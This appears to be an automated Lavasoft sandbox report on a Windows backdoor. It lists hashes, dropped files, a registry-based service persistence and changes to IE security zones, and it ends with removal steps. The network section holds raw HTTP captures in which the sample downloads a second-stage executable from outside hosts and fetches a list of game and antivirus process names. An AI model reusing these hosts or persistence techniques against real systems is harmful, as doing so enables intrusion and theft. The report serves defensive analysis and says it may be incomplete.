Trojan.Win32.Chifrax.a (Kaspersky), Trojan.Generic.11192339 (B) (Emsisoft), Trojan.Generic.11192339 (AdAware), Backdoor.Win32.Farfli.FD, Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Backdoor, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 8ed2beb05d64cacfac8bea5c186fc7f7
SHA1: 7e2cba288e0d42f19de32be0498babbb026fe08d
SHA256: a4797149e63e0058e11c3017afbca6d3669dd0922fbdef475559eaf8acdbcf3b
SSDeep: 6144:BY KFYiFdqGENDowjO v8BQf vESzFJ2SpUsO/LUNErlsOUqqHdQ21R5W7LvSSvn:BYZFJFvajbevESBJ2Vz0EhsHp9QQRgS3
Size: 384512 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: Chip Digital GmbH
Created at: 2014-04-09 06:17:17
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables a remote control of victim's machine.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Backdoor creates the following process(es):
WScript.exe:320
535.exe:2004
tasklist.exe:1868
tasklist.exe:1620
tasklist.exe:212
tasklist.exe:816
tasklist.exe:1996
%original file name%.exe:1848
wuauclt.exe:540
RarExel.exe:644
killwatcher.exe:512
ping.exe:1832
ping.exe:1996
ping.exe:1260
ping.exe:436
ping.exe:548
ping.exe:232
find.exe:1712
find.exe:1300
find.exe:1200
find.exe:1480
find.exe:240
find.exe:2004
The Backdoor injects its code into the following process(es):No processes have been created.
File activity
The process 535.exe:2004 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%WinDir%\Temp\WinService.dll (131 bytes)
The process %original file name%.exe:1848 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%WinDir%\killwatcher.exe (103 bytes)
%WinDir%\nsink.txt (34 bytes)
%Program Files%\WinRAR\RarExel.exe (3073 bytes)
C:\Hook.dll (4 bytes)
%WinDir%\iiis.txt (2 bytes)
The Backdoor deletes the following file(s):
%WinDir%\killwatcher.exe (0 bytes)
The process wuauclt.exe:540 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The Backdoor deletes the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)
The process RarExel.exe:644 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\535.exe (94 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\535.exe (0 bytes)
The process killwatcher.exe:512 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kw.cmd (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kw.vbs (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KW.exe (800 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\__tmp_rar_sfx_access_check_340765 (0 bytes)
Registry activity
The process WScript.exe:320 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 BE 13 55 DD 4E 41 DE F9 C7 6F D7 04 57 52 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"kw.cmd" = "kw"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process 535.exe:2004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 89 4E 7D A8 0D 04 AA A0 57 8A 38 66 9C DB BD"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost]
"netsvcs" = "6to4, AppMgmt, AudioSrv, Browser, CryptSvc, DMServer, DHCP, ERSvc, EventSystem, FastUserSwitchingCompatibility, HidServ, Ias, Iprip, Irmon, LanmanServer, LanmanWorkstation, Messenger, Netman, Nla, Ntmssvc, NWCWorkstation, Nwsapagent, Rasauto, Rasman, Remoteaccess, Schedule, Seclogon, SENS, Sharedaccess, SRService, Tapisrv, Themes, TrkWks, W32Time, WZCSVC, Wmi, WmdmPmSp, winmgmt, wscsvc, xmlprov, napagent, hkmsvc, BITS, wuauserv, ShellHWDetection, helpsvc, WmdmPmSN, iCount"
[HKLM\System\CurrentControlSet\Services\iCount]
"Description" = "·þÎñÃèÊö"
[HKLM\System\CurrentControlSet\Services\iCount\Parameters]
"seRVicemAIN" = "ServiceMain"
"ServiceDll" = "%WinDir%\Temp\WinService.dll"
The following service will be launched automatically at system boot up:
[HKLM\System\CurrentControlSet\Services\iCount]
"Start" = "2"
The process tasklist.exe:1868 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 3E F0 3E FE 17 90 BD 98 A9 2B 90 B9 86 B0 46"
The process tasklist.exe:1620 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 8F 44 07 25 A4 5D 29 46 B3 4A B8 66 88 BE 72"
The process tasklist.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 61 3A BC A0 14 F6 36 8A C6 B0 EE 12 20 4E 42"
The process tasklist.exe:816 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 0B 55 79 6B 6B 35 3D AC 4D C0 8A 47 79 BF CC"
The process tasklist.exe:1996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 01 39 28 4D B9 F3 B6 9D F7 5A 8D DE 45 FC 91"
The process %original file name%.exe:1848 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\WinRAR]
"RarExel.exe" = "RarExel"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%WinDir%]
"killwatcher.exe" = "killwatcher"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 61 32 A0 A4 CD 15 E4 A7 79 4F E3 F5 F0 C8 F1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process RarExel.exe:644 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 2E 5C E2 EB 08 0C 03 E0 7B F0 86 55 25 5F D2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"535.exe" = "535"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process killwatcher.exe:512 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 B2 39 E4 EA FD 4A EB B6 1C D0 8E D1 AB 27 B9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\WinRAR SFX]
"C%%DOCUME~1Âm%LOCALS~1%Temp" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"wscript.exe" = "Microsoft (R) Windows Based Script Host"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ping.exe:1832 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 05 DE 92 CC 67 42 E1 DA 7B D2 CD 3E 0A D6 F9"
The process ping.exe:1996 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 14 59 FD 1B 81 94 8D A5 F5 4D F1 F8 B3 69 C1"
The process ping.exe:1260 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 97 4A 5A 78 45 4E 61 0B 8D 62 05 A8 B0 7C 1D"
The process ping.exe:436 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 04 EB FE DE D9 69 2E B5 83 21 33 1E 9D 1A EF"
The process ping.exe:548 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 E5 24 6B 74 48 FE 5B 23 B5 49 ED 39 BA 55 03"
The process ping.exe:232 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC C4 72 EC F6 73 75 83 5A 1C DA 81 3A 9B AB 9D"
The process find.exe:1712 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 1B AB 4D 3B 50 0B 03 49 51 29 D4 C8 86 BE B0"
The process find.exe:1300 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE B0 B4 DF C2 FC 86 B7 2A B5 EE 86 61 1C 3A F7"
The process find.exe:1200 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 84 2E 96 2A 75 9C 97 29 EB 7F 88 0E B0 CC 57"
The process find.exe:1480 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "85 0C BC 5A 05 DA 7B E7 1A 7F CB B3 D3 47 C9 B6"
The process find.exe:240 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 09 0F 91 93 98 CB 44 69 23 D9 5E EC 86 FA B5"
The process find.exe:2004 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 96 9B 05 BB C1 89 F7 88 48 9A A4 3C 33 DF D2"
Dropped PE files
| MD5 | File path |
|---|---|
| f8bb7b18c9c70952f0c26419e975b0d7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\KW.exe |
| 4659f476b80e067bceeaa8e821c3fab8 | c:\Hook.dll |
| d56cfd9db6ca6231dba149f1282e609b | c:\Program Files\WinRAR\RarExel.exe |
| 81cc1f7dbdf8405f9deaf0bb219de6ee | c:\WINDOWS\Temp\WinService.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
WScript.exe:320
535.exe:2004
tasklist.exe:1868
tasklist.exe:1620
tasklist.exe:212
tasklist.exe:816
tasklist.exe:1996
%original file name%.exe:1848
wuauclt.exe:540
RarExel.exe:644
killwatcher.exe:512
ping.exe:1832
ping.exe:1996
ping.exe:1260
ping.exe:436
ping.exe:548
ping.exe:232
find.exe:1712
find.exe:1300
find.exe:1200
find.exe:1480
find.exe:240
find.exe:2004 - Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%WinDir%\Temp\WinService.dll (131 bytes)
%WinDir%\killwatcher.exe (103 bytes)
%WinDir%\nsink.txt (34 bytes)
%Program Files%\WinRAR\RarExel.exe (3073 bytes)
C:\Hook.dll (4 bytes)
%WinDir%\iiis.txt (2 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%Documents and Settings%\%current user%\Application Data\535.exe (94 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kw.cmd (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kw.vbs (93 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KW.exe (800 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 647168 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 651264 | 380928 | 378880 | 5.49485 | 88857984284153a263cbc776fc81463c |
| .rsrc | 1032192 | 8192 | 4608 | 2.20964 | bb84a6b99dc203a8ced12ad12f21d696 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://daxie.dbankcloud.com/adsafe2.exe | 122.11.38.177 |
| hxxp://14.17.110.138/dl/daxie/adsafe2.exe | |
| hxxp://597play.com/stopser.txt | 223.26.61.181 |
| hxxp://597play.com/lookjc.txt | 223.26.61.181 |
| hxxp://www.dnf8090.com/yc.jpg | 111.73.45.234 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /yc.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: VVV.dnf8090.com
Pragma: no-cache
HTTP/1.1 200 OK
Content-Length: 1094
Content-Type: image/jpeg
Last-Modified: Sun, 20 Apr 2014 08:11:15 GMT
Accept-Ranges: bytes
ETag: "14c9e819705ccf1:589"
Server: Microsoft-IIS/6.0
Date: Fri, 02 May 2014 05:31:23 GMT
Connection: close
JLDSCEBLDRJFBFHQJABGJPIPELGEGWAPCQETDICHJGACCLDWHNIQJIBQBTJPAADYAMEODFDKJNCNEFHGIQAGAFHAEHBGDIFYAPBSIICBINCMAFIFEFJDAACOFRJCHBBGBMAZHFIOJTGKFIBTIQEWDIFAIZIUDSJCFKHCAIJKEWHVBGAEGRAFIZBKFWIXBNGVIZBFFQJLBECHFMAFJGFYHYDJFJCOEUHLIEHYFFDXEBCGDUDIIDHREIJADHIFGZJEJCJJIBIEGJAFDWABCOBMFACCIYIKIPDECJDNGGALECHXAHCCHFIOFSFMBRGJAZIBIYARHXFMENHOJSBLJSJFFADXFTFKFQGBGKAGGQECFPHFGIBXDCIPCTJNEVHPJRHBBSHJCGEKDXAZDXDDDNJABKGBAAGNJKFVARDDIQALDOESCRBJGQAOIYCTHEFWAGIVFRFKCKECAUASASFPCXCGGYBKEOAXADIGEGJNENACCHJQBZBBETHKCIEBBKDKJCGPHMCZJUJKAVDJAJENGGANFPCBDRJNBBJHGQBSASDDIGEUCKHECAHKDFIZILDWGHHCGJHOCIAXJVCEFHBGFUGBAKILIEFPBOCYFWGLFIARDWEOASCVAWHLDRBABOFVDRBMESBECKJPBCBABTGIGUHGHYHHFJCOCIGODKDLAQFPBMCRCMCVAOFACWHPHIJBJEFQISHCBEDOFCCNIIGGILJAIMHLEEGPGCCPGMFJIMDSBMAOAEFNJOJFHODMAYASDXFFILGDIIHPGJBDAFFAGPJIBZAKDNCOBFAYFUAIHVDKITIXIBARHKDJCSHNIIBEHVIKAYEEHQCDCYFBHXCZEABFBAFNDHEHERDKHJGWAOCGEUDVIHBUDFAXGACNDLFBDIJUJJHCFOFVDLIWEKHRJAFSFGCJHXGTIDBOFDHIHHCCDRAVAHHKAPASCWCABHGKIJHOAUAJFVHMENBWHJCLHUADJRDEDTGIIQELENDMFLGYJGGKCUAIFPEMCJDOGFHKIIFGJEHTDVEGDSDGIABDBPIPFZAWDEGIBFDQAAEEAMIMBBHWJNFYAAGUFBACIWDFJRETDCADFC..
GET /dl/daxie/adsafe2.exe HTTP/1.1
Host: 14.17.110.138
Accept: */*
Referer: hXXp://14.17.110.138/dl/daxie
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.1.13
Date: Fri, 02 May 2014 05:32:37 GMT
Content-Length: 494080
Connection: close
Content-Type: application/octet-stream
Last-Modified: Sat, 03 May 2014 05:32:37 GMT
Cache-Control: max-age=86400
Expires: Sat, 03 May 2014 05:32:37 GMT
Content-Disposition: attachment; filename="adsafe2.exe"
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;]8..<VT.<VT.<VT. ZT|<VT. XTT<VT)#ETS<VT.#ETj<VT.<WT'>VTI.\T.<VTI.]T$<VT.#]T5<VT.<VT_<VT.:PT~<VTRich.<VT................PE..L....g`S.................p... ...@.......P........@.................................................................................................................................................................................................UPX0.....@..............................UPX1.....p...P...f..................@....rsrc.... ....... ...j..............@......................................................................................................................................................................................................................................................................................................................................................................................3.02.UPX!.....G......T....b......&".&....3.....u.........t...A..t;.....u.......~.....3.........t......A.L&..t."..p..t........A. ......U........@... ..<$Q.E..d.u......Q.....".Y.*.....Iu..u.&4.......n..X..$W.UV....2.....H<}......X..].^j.Ku........h...m..}........C.hM.....x.BP.i- .......j.=.....wF...J..e.P..6...1..P....]..t\H;..S.....V.....h.B......h..|...G@.;.rvr.....EaD......h.WQf.....i'..k.....o.w.....\h...J..u..Cv....R.Ph..PE..........\..L.0...G..?...L......`@....1...2.u...N[.!...........
<<
<<< skipped >>>
GET /stopser.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 597play.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 02 May 2014 05:32:41 GMT
Server: Apache/2
Last-Modified: Wed, 30 Apr 2014 02:27:20 GMT
ETag: "1835d7-6-4f83949b5b087"
Accept-Ranges: bytes
Content-Length: 6
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
iCount....
GET /lookjc.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: */*
Host: 597play.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 02 May 2014 05:32:41 GMT
Server: Apache/2
Last-Modified: Wed, 30 Apr 2014 04:28:43 GMT
ETag: "1835d8-a6-4f83afbd874b6"
Accept-Ranges: bytes
Content-Length: 166
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
launcher.exe..QQlogin.exe..QQ.....exe..DNFchina.exe..World of Warcraft Launcher.exe..my.exe..xy2.exe..360Safe.exe..360sd.exe..crossfire.exe..LOLBox.exe..LolClient.exeHTTP/1.1 200 OK..Date: Fri, 02 May 2014 05:32:41 GMT..Server: Apache/2..Last-Modified: Wed, 30 Apr 2014 04:28:43 GMT..ETag: "1835d8-a6-4f83afbd874b6"..Accept-Ranges: bytes..Content-Length: 166..Vary: Accept-Encoding,User-Agent..Content-Type: text/plain..launcher.exe..QQlogin.exe..QQ.....exe..DNFchina.exe..World of Warcraft Launcher.exe..my.exe..xy2.exe..360Safe.exe..360sd.exe..crossfire.exe..LOLBox.exe..LolClient.exe..
GET /adsafe2.exe HTTP/1.1
Host: daxie.dbankcloud.com
Accept: */*
Referer: hXXp://daxie.dbankcloud.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.2.6
Date: Fri, 02 May 2014 05:32:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://14.17.110.138/dl/daxie/adsafe2.exe
0..
Map
Strings from Dumps
svchost.exe_1060:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
user32.dll
user32.dll
OLEACC.DLL
OLEACC.DLL
EnumChildWindows
EnumChildWindows
WebBrowser
WebBrowser
